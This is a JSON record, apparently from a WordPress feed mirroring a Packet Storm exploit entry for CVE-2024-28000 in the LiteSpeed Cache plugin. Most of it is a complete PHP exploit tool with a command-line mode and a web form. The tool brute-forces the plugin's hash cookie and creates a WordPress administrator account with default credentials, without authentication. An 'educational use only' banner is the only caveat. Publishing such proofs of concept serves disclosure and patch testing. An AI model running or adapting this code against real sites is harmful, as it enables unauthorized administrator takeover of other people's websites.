{“lastseen”:”2025-12-24T16:34:29″,”description”:”WordPress Litespeed Cache plugin version 6.4.0.1 allows attackers to brute-force authentication hashes and create administrative users without any initial credentials…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Litespeed Cache 6.4.0.1 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:213294″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-28000″],”sourceData”:”=============================================================================================================================================\\n | # Title : Litespeed Cache 6.4.0.1 Insufficient Hash Validation |\\n | # Author : indoushka |\\n | # Tested on : windows 11 Fr(Pro) \/ browser : Mozilla firefox 145.0.1 (64 bits) |\\n | # Vendor : https:\/\/www.litespeedtech.com\/products\/cache-plugins |\\n =============================================================================================================================================\\n \\n [+] References : https:\/\/packetstorm.news\/files\/id\/200819\/ \\u0026 \\t\\tCVE-2024-28000\\n \\n [+] Summary : \\n Critical unauthenticated privilege escalation vulnerability in LiteSpeed Cache WordPress plugin (versions 6.4.0.1) \\n \\t\\t\\t allowing attackers to brute-force authentication hashes and create administrative users without any initial credentials.\\n [+] POC : \\n \\n php poc.php or http:\/\/127.0.0.1\/poc.php \\n \\n \\u003c?php\\n \/*\\n * LiteSpeed Cache 6.4.0.1 – Privilege Escalation\\n * by indoushka\\n *\/\\n \\n class LiteSpeedPrivEsc {\\n private $target;\\n private $port;\\n private $ssl;\\n private $base_path;\\n private $timeout;\\n private $admin_user_id;\\n private $new_username;\\n private $new_user_password;\\n \\n public function __construct($target, $port = 80, $ssl = false, $base_path = ‘\/’, $admin_user_id = ‘1’, $new_username = ‘newadmin’, $new_user_password = ‘AdminPass123!’) {\\n $this-\\u003etarget = $target;\\n $this-\\u003eport = $port;\\n $this-\\u003essl = $ssl;\\n $this-\\u003ebase_path = rtrim($base_path, ‘\/’);\\n $this-\\u003etimeout = 30;\\n $this-\\u003eadmin_user_id = $admin_user_id;\\n $this-\\u003enew_username = $new_username;\\n $this-\\u003enew_user_password = $new_user_password;\\n }\\n \\n \/**\\n * Check if target is vulnerable\\n *\/\\n public function check() {\\n echo \\”[*] Checking LiteSpeed Cache vulnerability…\\\\n\\”;\\n \\n \/\/ Check if WordPress REST API is accessible\\n $res = $this-\\u003esend_request(‘\/wp-json\/wp\/v2\/users’);\\n if (!$res || $res[‘code’] != 200) {\\n echo \\”[-] WordPress REST API not accessible\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n \\n echo \\”[+] WordPress REST API detected\\\\n\\”;\\n \\n \/\/ Try to trigger hash generation\\n if ($this-\\u003etrigger_hash_generation()) {\\n echo \\”[+] Hash generation endpoint accessible\\\\n\\”;\\n \\n \/\/ Test with a random hash\\n $test_hash = $this-\\u003egenerate_random_string(6);\\n $test_result = $this-\\u003etest_hash($test_hash);\\n \\n if ($test_result === ‘unauthorized’) {\\n echo \\”[+] Hash validation is active\\\\n\\”;\\n echo \\”[+] Target appears to be vulnerable\\\\n\\”;\\n return \\”vulnerable\\”;\\n } else {\\n echo \\”[-] Hash validation not working as expected\\\\n\\”;\\n return \\”unknown\\”;\\n }\\n }\\n \\n echo \\”[-] Cannot trigger hash generation\\\\n\\”;\\n return \\”safe\\”;\\n }\\n \\n \/**\\n * Trigger hash generation via AJAX\\n *\/\\n private function trigger_hash_generation() {\\n $data = [\\n ‘action’ =\\u003e ‘async_litespeed’,\\n ‘litespeed_type’ =\\u003e ‘crawler’\\n ];\\n \\n $res = $this-\\u003esend_request(‘\/wp-admin\/admin-ajax.php’, ‘POST’, [], http_build_query($data));\\n \\n return $res \\u0026\\u0026 $res[‘code’] == 200;\\n }\\n \\n \/**\\n * Test a specific hash value\\n *\/\\n private function test_hash($hash_value) {\\n $cookies = [\\n ‘litespeed_hash’ =\\u003e $hash_value,\\n ‘litespeed_role’ =\\u003e $this-\\u003eadmin_user_id\\n ];\\n \\n $res = $this-\\u003esend_request(‘\/wp-json\/wp\/v2\/users’, ‘POST’, [], null, [], $cookies);\\n \\n if (!$res) {\\n return ‘error’;\\n }\\n \\n if ($res[‘code’] == 201) {\\n return ‘success’;\\n } elseif ($res[‘code’] == 401) {\\n return ‘unauthorized’;\\n } else {\\n return ‘unknown’;\\n }\\n }\\n \\n \/**\\n * Generate random string\\n *\/\\n private function generate_random_string($length = 6) {\\n $chars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789’;\\n $result = ”;\\n for ($i = 0; $i \\u003c $length; $i++) {\\n $result .= $chars[rand(0, strlen($chars) – 1)];\\n }\\n return $result;\\n }\\n \\n \/**\\n * Create admin user with valid hash\\n *\/\\n private function create_admin_user($hash_value) {\\n $cookies = [\\n ‘litespeed_hash’ =\\u003e $hash_value,\\n ‘litespeed_role’ =\\u003e $this-\\u003eadmin_user_id\\n ];\\n \\n $user_data = [\\n ‘username’ =\\u003e $this-\\u003enew_username,\\n ‘password’ =\\u003e $this-\\u003enew_user_password,\\n ’email’ =\\u003e $this-\\u003enew_username . ‘@example.com’,\\n ‘roles’ =\\u003e [‘administrator’]\\n ];\\n \\n $json_data = json_encode($user_data);\\n \\n $headers = [\\n ‘Content-Type: application\/json’,\\n ‘Content-Length: ‘ . strlen($json_data)\\n ];\\n \\n $res = $this-\\u003esend_request(‘\/wp-json\/wp\/v2\/users’, ‘POST’, [], $json_data, $headers, $cookies);\\n \\n if ($res \\u0026\\u0026 $res[‘code’] == 201) {\\n echo \\”[+] \u2713 Admin user created successfully!\\\\n\\”;\\n echo \\”[+] Username: {$this-\\u003enew_username}\\\\n\\”;\\n echo \\”[+] Password: {$this-\\u003enew_user_password}\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Failed to create admin user\\\\n\\”;\\n if ($res) {\\n echo \\”[-] HTTP Code: {$res[‘code’]}\\\\n\\”;\\n echo \\”[-] Response: {$res[‘body’]}\\\\n\\”;\\n }\\n return false;\\n }\\n }\\n \\n \/**\\n * Brute force hash values\\n *\/\\n public function brute_force_hashes($max_attempts = 10000, $workers = 5) {\\n echo \\”[*] Starting hash brute force…\\\\n\\”;\\n echo \\”[*] Attempts: $max_attempts, Workers: $workers\\\\n\\”;\\n \\n \/\/ Trigger hash generation first\\n $this-\\u003etrigger_hash_generation();\\n \\n $found = false;\\n $attempts = 0;\\n \\n for ($i = 0; $i \\u003c $max_attempts \\u0026\\u0026 !$found; $i++) {\\n $hash = $this-\\u003egenerate_random_string(6);\\n \\n if ($i % 100 == 0) {\\n echo \\”[*] Attempt $i: Testing hash: $hash\\\\n\\”;\\n }\\n \\n $result = $this-\\u003etest_hash($hash);\\n \\n if ($result === ‘success’) {\\n echo \\”[+] \u2713 Valid hash found: $hash\\\\n\\”;\\n echo \\”[*] Creating admin user…\\\\n\\”;\\n if ($this-\\u003ecreate_admin_user($hash)) {\\n $found = true;\\n return true;\\n }\\n }\\n \\n $attempts++;\\n }\\n \\n echo \\”[-] No valid hash found after $attempts attempts\\\\n\\”;\\n return false;\\n }\\n \\n \/**\\n * Execute full exploit\\n *\/\\n public function exploit($max_attempts = 10000) {\\n echo \\”[*] Starting LiteSpeed Cache privilege escalation…\\\\n\\”;\\n \\n \/\/ Step 1: Check vulnerability\\n $status = $this-\\u003echeck();\\n if ($status !== \\”vulnerable\\”) {\\n echo \\”[-] Target does not appear to be vulnerable\\\\n\\”;\\n return false;\\n }\\n \\n echo \\”[*] Target is vulnerable, proceeding with exploitation…\\\\n\\”;\\n \\n \/\/ Step 2: Brute force hashes\\n if ($this-\\u003ebrute_force_hashes($max_attempts)) {\\n echo \\”[+] \u2713 Privilege escalation completed successfully\\\\n\\”;\\n return true;\\n } else {\\n echo \\”[-] Privilege escalation failed\\\\n\\”;\\n return false;\\n }\\n }\\n \\n \/**\\n * Send HTTP request\\n *\/\\n private function send_request($path, $method = ‘GET’, $params = [], $data = null, $custom_headers = [], $cookies = []) {\\n $url = $this-\\u003ebuild_url($path);\\n \\n if ($method == ‘GET’ \\u0026\\u0026 !empty($params)) {\\n $url .= ‘?’ . http_build_query($params);\\n }\\n \\n $ch = curl_init();\\n curl_setopt_array($ch, [\\n CURLOPT_URL =\\u003e $url,\\n CURLOPT_RETURNTRANSFER =\\u003e true,\\n CURLOPT_TIMEOUT =\\u003e $this-\\u003etimeout,\\n CURLOPT_SSL_VERIFYPEER =\\u003e false,\\n CURLOPT_SSL_VERIFYHOST =\\u003e false,\\n CURLOPT_USERAGENT =\\u003e ‘Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’,\\n CURLOPT_HEADER =\\u003e false,\\n CURLOPT_CUSTOMREQUEST =\\u003e $method,\\n CURLOPT_FOLLOWLOCATION =\\u003e false\\n ]);\\n \\n \/\/ Add POST data if provided\\n if ($method == ‘POST’ \\u0026\\u0026 $data) {\\n curl_setopt($ch, CURLOPT_POSTFIELDS, $data);\\n }\\n \\n \/\/ Build headers\\n $headers = array_merge([\\n ‘User-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36’\\n ], $custom_headers);\\n \\n curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\\n \\n \/\/ Add cookies if provided\\n if (!empty($cookies)) {\\n $cookie_string = ”;\\n foreach ($cookies as $name =\\u003e $value) {\\n $cookie_string .= \\”{$name}={$value}; \\”;\\n }\\n curl_setopt($ch, CURLOPT_COOKIE, $cookie_string);\\n }\\n \\n $response = curl_exec($ch);\\n $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\\n curl_close($ch);\\n \\n if ($response !== false) {\\n return [\\n ‘code’ =\\u003e $http_code,\\n ‘body’ =\\u003e $response\\n ];\\n }\\n \\n return false;\\n }\\n \\n \/**\\n * Build full URL\\n *\/\\n private function build_url($path) {\\n $protocol = $this-\\u003essl ? ‘https’ : ‘http’;\\n $full_path = $this-\\u003ebase_path . $path;\\n return \\”{$protocol}:\/\/{$this-\\u003etarget}:{$this-\\u003eport}{$full_path}\\”;\\n }\\n }\\n \\n \/\/ CLI Interface\\n if (php_sapi_name() === ‘cli’) {\\n echo \\”\\n \u2554\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2557\\n \u2551 LiteSpeed Cache Privilege Escalation \u2551\\n \u2551 CVE-2024-28000 \u2551\\n \u2551 PHP Implementation \u2551\\n \u255a\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u2550\u255d\\n \\n \\\\n\\”;\\n \\n $options = getopt(\\”t:p:s:u:cU:P:a:\\”, [\\n \\”target:\\”,\\n \\”port:\\”,\\n \\”ssl\\”,\\n \\”uri:\\”,\\n \\”check\\”,\\n \\”username:\\”,\\n \\”password:\\”,\\n \\”attempts:\\”\\n ]);\\n \\n $target = $options[‘t’] ?? $options[‘target’] ?? null;\\n $port = $options[‘p’] ?? $options[‘port’] ?? 80;\\n $ssl = isset($options[‘s’]) || isset($options[‘ssl’]);\\n $base_uri = $options[‘u’] ?? $options[‘uri’] ?? ‘\/’;\\n $check_only = isset($options[‘c’]) || isset($options[‘check’]);\\n $username = $options[‘U’] ?? $options[‘username’] ?? ‘newadmin’;\\n $password = $options[‘P’] ?? $options[‘password’] ?? ‘AdminPass123!’;\\n $attempts = $options[‘a’] ?? $options[‘attempts’] ?? 10000;\\n \\n if (!$target) {\\n echo \\”Usage: php litespeed_exploit.php [options]\\\\n\\”;\\n echo \\”Options:\\\\n\\”;\\n echo \\” -t, –target Target host (required)\\\\n\\”;\\n echo \\” -p, –port Target port (default: 80)\\\\n\\”;\\n echo \\” -s, –ssl Use SSL (default: false)\\\\n\\”;\\n echo \\” -u, –uri Base URI path (default: \/)\\\\n\\”;\\n echo \\” -c, –check Check only (don’t exploit)\\\\n\\”;\\n echo \\” -U, –username New admin username (default: newadmin)\\\\n\\”;\\n echo \\” -P, –password New admin password (default: AdminPass123!)\\\\n\\”;\\n echo \\” -a, –attempts Brute force attempts (default: 10000)\\\\n\\”;\\n echo \\”\\\\nExamples:\\\\n\\”;\\n echo \\” php litespeed_exploit.php -t 192.168.1.100 -c\\\\n\\”;\\n echo \\” php litespeed_exploit.php -t wordpress.example.com -U myadmin -P MySecurePass123 -a 50000\\\\n\\”;\\n exit(1);\\n }\\n \\n $exploit = new LiteSpeedPrivEsc($target, $port, $ssl, $base_uri, ‘1’, $username, $password);\\n \\n if ($check_only) {\\n $result = $exploit-\\u003echeck();\\n echo \\”\\\\n[*] Result: {$result}\\\\n\\”;\\n } else {\\n if ($exploit-\\u003eexploit($attempts)) {\\n echo \\”[+] Exploitation completed successfully\\\\n\\”;\\n } else {\\n echo \\”[-] Exploitation failed\\\\n\\”;\\n }\\n }\\n \\n } else {\\n \/\/ Web Interface\\n $action = $_POST[‘action’] ?? ”;\\n \\n if ($action === ‘check’ || $action === ‘exploit’) {\\n $target = $_POST[‘target’] ?? ”;\\n $port = $_POST[‘port’] ?? 80;\\n $ssl = isset($_POST[‘ssl’]);\\n $base_uri = $_POST[‘uri’] ?? ‘\/’;\\n $username = $_POST[‘username’] ?? ‘newadmin’;\\n $password = $_POST[‘password’] ?? ‘AdminPass123!’;\\n $attempts = $_POST[‘attempts’] ?? 10000;\\n \\n if (empty($target)) {\\n echo \\”\\u003cdiv style=’color: red; padding: 10px; border: 1px solid red; margin: 10px;’\\u003eTarget host is required\\u003c\/div\\u003e\\”;\\n } else {\\n $exploit = new LiteSpeedPrivEsc($target, $port, $ssl, $base_uri, ‘1’, $username, $password);\\n \\n ob_start();\\n if ($action === ‘check’) {\\n $exploit-\\u003echeck();\\n } else {\\n $exploit-\\u003eexploit($attempts);\\n }\\n $output = ob_get_clean();\\n \\n echo \\”\\u003cpre style=’background: #f4f4f4; padding: 15px; border: 1px solid #ddd; border-radius: 4px;’\\u003e$output\\u003c\/pre\\u003e\\”;\\n }\\n \\n echo ‘\\u003ca href=\\”‘ . htmlspecialchars($_SERVER[‘PHP_SELF’]) . ‘\\” style=\\”display: inline-block; padding: 10px 20px; background: #007cba; color: white; text-decoration: none; border-radius: 4px; margin: 10px 0;\\”\\u003eBack to Form\\u003c\/a\\u003e’;\\n \\n } else {\\n \/\/ Display the form\\n echo ‘\\u003c!DOCTYPE html\\u003e\\n \\u003chtml\\u003e\\n \\u003chead\\u003e\\n \\u003ctitle\\u003eLiteSpeed Cache Privilege Escalation – CVE-2024-28000\\u003c\/title\\u003e\\n \\u003cmeta charset=\\”UTF-8\\”\\u003e\\n \\u003cstyle\\u003e\\n body { \\n font-family: Arial, sans-serif; \\n margin: 0; \\n padding: 20px; \\n background: #f5f5f5;\\n }\\n .container { \\n max-width: 800px; \\n margin: 0 auto; \\n background: white;\\n padding: 30px;\\n border-radius: 8px;\\n box-shadow: 0 2px 10px rgba(0,0,0,0.1);\\n }\\n h1 { \\n color: #333; \\n border-bottom: 2px solid #007cba;\\n padding-bottom: 10px;\\n }\\n h3 {\\n color: #666;\\n }\\n .form-group { \\n margin-bottom: 20px; \\n }\\n label { \\n display: block; \\n margin-bottom: 8px; \\n font-weight: bold;\\n color: #333;\\n }\\n input[type=\\”text\\”], input[type=\\”password\\”], select { \\n width: 100%; \\n padding: 10px; \\n border: 1px solid #ddd; \\n border-radius: 4px; \\n box-sizing: border-box;\\n font-size: 14px;\\n }\\n .checkbox-group {\\n display: flex;\\n align-items: center;\\n gap: 10px;\\n }\\n button { \\n background: #007cba; \\n color: white; \\n padding: 12px 25px; \\n border: none; \\n border-radius: 4px; \\n cursor: pointer; \\n margin-right: 10px;\\n font-size: 16px;\\n transition: background 0.3s;\\n }\\n button:hover {\\n background: #005a87;\\n }\\n .danger { \\n background: #dc3545; \\n }\\n .danger:hover {\\n background: #c82333;\\n }\\n .info { \\n background: #17a2b8; \\n }\\n .info:hover {\\n background: #138496;\\n }\\n .warning-box {\\n background: #fff3cd;\\n border: 1px solid #ffeaa7;\\n color: #856404;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n .info-box {\\n background: #d1ecf1;\\n border: 1px solid #bee5eb;\\n color: #0c5460;\\n padding: 15px;\\n border-radius: 4px;\\n margin: 20px 0;\\n }\\n \\u003c\/style\\u003e\\n \\u003c\/head\\u003e\\n \\u003cbody\\u003e\\n \\u003cdiv class=\\”container\\”\\u003e\\n \\u003ch1\\u003eLiteSpeed Cache Privilege Escalation\\u003c\/h1\\u003e\\n \\u003ch3\\u003eCVE-2024-28000 – Hash Brute Force to Admin Access\\u003c\/h3\\u003e\\n \\n \\u003cdiv class=\\”warning-box\\”\\u003e\\n \\u003cstrong\\u003e\u26a0\ufe0f Educational Use Only:\\u003c\/strong\\u003e This tool demonstrates a privilege escalation vulnerability in LiteSpeed Cache.\\n Use only on systems you own or have explicit permission to test.\\n \\u003c\/div\\u003e\\n \\n \\u003cform method=\\”post\\”\\u003e\\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”target\\”\\u003eTarget Host:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”target\\” name=\\”target\\” placeholder=\\”192.168.1.100 or wordpress.example.com\\” required\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”port\\”\\u003ePort:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”port\\” name=\\”port\\” value=\\”80\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”uri\\”\\u003eBase URI:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”uri\\” name=\\”uri\\” value=\\”\/\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003cdiv class=\\”checkbox-group\\”\\u003e\\n \\u003cinput type=\\”checkbox\\” id=\\”ssl\\” name=\\”ssl\\”\\u003e\\n \\u003clabel for=\\”ssl\\” style=\\”display: inline; font-weight: normal;\\”\\u003eUse SSL\\u003c\/label\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”username\\”\\u003eNew Admin Username:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”username\\” name=\\”username\\” value=\\”newadmin\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”password\\”\\u003eNew Admin Password:\\u003c\/label\\u003e\\n \\u003cinput type=\\”password\\” id=\\”password\\” name=\\”password\\” value=\\”AdminPass123!\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cdiv class=\\”form-group\\”\\u003e\\n \\u003clabel for=\\”attempts\\”\\u003eBrute Force Attempts:\\u003c\/label\\u003e\\n \\u003cinput type=\\”text\\” id=\\”attempts\\” name=\\”attempts\\” value=\\”10000\\”\\u003e\\n \\u003c\/div\\u003e\\n \\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”check\\” class=\\”info\\”\\u003eCheck Vulnerability\\u003c\/button\\u003e\\n \\u003cbutton type=\\”submit\\” name=\\”action\\” value=\\”exploit\\” class=\\”danger\\”\\u003eExecute Exploit\\u003c\/button\\u003e\\n \\u003c\/form\\u003e\\n \\n \\u003cdiv class=\\”info-box\\”\\u003e\\n \\u003ch3\\u003eAbout CVE-2024-28000:\\u003c\/h3\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eVulnerability:\\u003c\/strong\\u003e Insufficient hash validation leading to privilege escalation\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAffected Versions:\\u003c\/strong\\u003e LiteSpeed Cache \u2264 6.4.0.1\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAuthentication:\\u003c\/strong\\u003e None required for initial access\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eEndpoint:\\u003c\/strong\\u003e \/wp-admin\/admin-ajax.php \\u0026 \/wp-json\/wp\/v2\/users\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eAttack:\\u003c\/strong\\u003e Hash brute force to create admin user\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eImpact:\\u003c\/strong\\u003e Privilege escalation to WordPress administrator\\u003c\/p\\u003e\\n \\u003cp\\u003e\\u003cstrong\\u003eExploit Chain:\\u003c\/strong\\u003e Trigger Hash \u2192 Brute Force \u2192 Create Admin User\\u003c\/p\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/div\\u003e\\n \\u003c\/body\\u003e\\n \\u003c\/html\\u003e’;\\n }\\n }\\n ?\\u003e\\n \\n Greetings to :=====================================================================================\\n jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\\n ===================================================================================================”,”sourceHref”:”https:\/\/packetstorm.news\/download\/213294″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/213294\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-12-24T16:34:29″,”description”:”WordPress Litespeed Cache plugin version 6.4.0.1 allows attackers to brute-force authentication hashes and create administrative users without any initial credentials…”,”published”:”2025-12-24T00:00:00″,”modified”:”2025-12-24T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 Litespeed Cache 6.4.0.1 Privilege Escalation”,”source”:””,”references”:””,”id”:”PACKETSTORM:213294″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2024-28000″],”sourceData”:”=============================================================================================================================================\\n…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-32690","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n